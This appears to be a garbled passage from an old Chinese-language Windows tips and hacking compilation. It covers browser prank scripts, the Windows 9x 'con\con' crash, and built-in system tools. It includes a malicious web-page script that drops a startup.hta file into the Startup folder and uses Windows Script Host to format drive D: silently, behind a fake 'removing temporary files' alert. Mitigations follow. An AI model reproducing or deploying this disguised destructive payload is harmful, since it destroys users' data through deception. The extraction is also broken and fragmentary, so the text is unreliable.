50、)for (i = 1;i0; j-)window.top.moveBy(0,i);window.top.moveBy(i,0);window.top.moveBy(0,-i*2);window.top.moveBy(-i*2,0);window.top.moveBy(0,i);window.top.moveBy(i,0);說明：是windows9x的設(shè)備名稱解析漏洞！WINDOWS9x的concon設(shè)備名稱解析漏洞允許用戶進行攻擊，倒是98死機。原理：我們知道，CON是DOS下的特殊設(shè)備名，不允許做文件名，如果我們在DOS下鍵入如下命令：copy coldcrysky.txt con，系統(tǒng)會

51、顯示coldcrysky.txt的內(nèi)容，如果換成：copy coldcrysky.txtcon系統(tǒng)會提示文件不能拷貝到文件自身。如果吧con換成LPT或PRN，則輸出coldcrysky.txt到打印機。由此可見，CON代表文件本身，如果使用CONCON命令，則意味著系統(tǒng)不斷調(diào)用文件本身，視系統(tǒng)資源迅速枯竭，連按CTRL+ALT+DEL的機會都沒有解決辦法：對于9X系統(tǒng)，強烈建議打補?。?000和XP則不會死機D、格式化硬盤：（最恐怖的慎用！請勿用于非法用途！使用后如果有任何負作用，后果自負！與傷寒天空ColdCrySky；亂刀留影無關(guān)?。﹕cr,Reset();scr.Path=C:WIND

52、OWSStartMenuPrograms啟動startup.htm;scr.Doc=WSH.rUN(start/m d:/q/autotest/u);alert(IMPORTANT : Windows is removing unused temporary files.);scr.write();說明：當您瀏覽了網(wǎng)頁，會把startup.hta文件寫入啟動文件夾，并提示W(wǎng)INDOWS正在刪除臨時文件！實際上是在格式化你的D盤，代碼中的：F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對應(yīng)為：Windows Scripting Host Shell

53、 Object。代碼中的：WSH全稱是：Windows Scripting Host，是微軟的一種基于32位系統(tǒng)平臺與語言無關(guān)的教本解釋機制，它使得腳本能在WINDOWS桌面或命令提示符下運行WSH所對應(yīng)的程序WScript.exe是一個腳本語言解釋器，位于WINDOWS所在文件夾下，所以它可以像執(zhí)行批處理文件一樣執(zhí)行WSH腳本程序解決方法：1）更新您的瀏覽器，使用最新的瀏覽器上網(wǎng)！2）修改msdos.sys，在其中加入：Bootmentu=0命令行，目的是禁用啟動菜單。3）吧改名4）禁用WSH。具體方法：在win98中，從添加刪除程序中點擊WINDOWS安裝程序，打開附件

54、一項，將WINDOWS SCRIPTING HOST前面的選項去掉，就可以卸載掉WSH了win2000和xp的用戶可以在我的電腦-工具菜單-文件夾選項-選擇文件類型，找到VBS VBSCRIPT FILE選項，點擊刪除！29）系統(tǒng)自帶的系統(tǒng)工具其實無論大家從什么地方，什么方法找到一些好用的工具，都不如Windows自帶的工具用著方便（假設(shè)你區(qū)的地方正好不能上網(wǎng)，而你又沒有準備好這些工具，那怎么辦？呵呵，不用著急，用好下面幾個Windows自帶的小工具，可以使你事半功倍?。?、msinfo32.exe位于C:Program FilesCommon FilesMicrosoft SharedMsi

55、nfomsinfo32.exe，顯示計算機中的有關(guān)系統(tǒng)信息，可用其診斷、解決計算機問題并查看遠程系統(tǒng)所生成的系統(tǒng)報告。2、drwatson.exe -這個工具給我特別的親密感覺：第一次使用這個工具是在看了LK007大哥給cool兄弟的回復以后，我馬上試驗果然很有意思！LK007不愧是大哥！現(xiàn)在想起來都佩服不已位于C: Windows drwatson.exe，當某個應(yīng)用程序在運行過程中出錯時，它就會將出錯的程序以及出錯的內(nèi)存地址一一記錄下來，并保存為Windows的Drwatson子目錄下的*.wlg記錄文件。3、sfc.exe位于C:WindowsSystemsfc.exe，用于自動搜索被改變、刪除或損壞了的系統(tǒng)文件。4、msconfig.exe位于C:WindowsSystemmsconfig.exe，通過修改啟動方式以及啟動時運行哪些應(yīng)用程序等系統(tǒng)配置，從而達到快速排除故障的目的。5、scanreg.exe位于C:win